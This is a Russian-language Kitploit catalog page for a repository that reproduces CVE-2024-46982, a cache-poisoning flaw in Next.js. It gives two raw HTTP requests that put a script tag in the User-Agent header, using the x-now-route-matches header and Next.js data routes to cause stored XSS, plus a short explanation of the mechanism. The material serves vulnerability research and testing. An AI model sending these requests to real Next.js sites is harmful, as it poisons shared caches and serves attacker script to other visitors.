Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46982-Reproduction — Воспроизведение CVE-2024-46982 | Kitploit
Инструменты/GitHubGitHub/samuel871211/cve-2024-46982-reproduction
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасность
GitHubsamuel871211/cve-2024-46982-reproduction

CVE-2024-46982-Reproduction

Воспроизведение CVE-2024-46982

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
7 месяцев назадЕщё не проверено

Начало работы

  1. Установите Node.js LTS
  2. npm install
  3. npm run build
  4. npm run start

Эксплуатация 1: Хранимый XSS через отравление кэша

  1. Отправьте следующий HTTP-запрос (вредоносный запрос) с помощью любого HTTP-клиента.
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack 2. Откройте http://localhost:3000 (обычный запрос) в любом веб-браузере. CVE-2024-46982-normal

Эксплуатация 2: Хранимый XSS через отравление кэша

  1. Отправьте следующий HTTP-запрос (вредоносный запрос) с помощью любого HTTP-клиента, убедитесь, что заменили "UiKoKFFGnF1td3mMyeDX5" на ваш ".next/BUILD_ID" CVE-2024-46982-build-id
root@kitploit:~
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack-2 2. Откройте http://localhost:3000 (обычный запрос) в любом веб-браузере. CVE-2024-46982-normal

Как это работает?

  1. x-now-route-matches — это специальный HTTP-заголовок, распознаваемый Next.js. При его наличии Next.js обрабатывает HTTP-запрос как «SSG» (генерация статических сайтов), благодаря чему HTTP-ответ может кэшироваться (Cache-Control: s-maxage=1, stale-while-revalidate).

  2. ?__nextDataReq=1 — это строка запроса, распознаваемая Next.js. При её наличии Next.js обрабатывает HTTP-запрос как «получение __NEXT_DATA__».

Полное описание можно найти в разделе Credit.

Credit

Скачать инструмент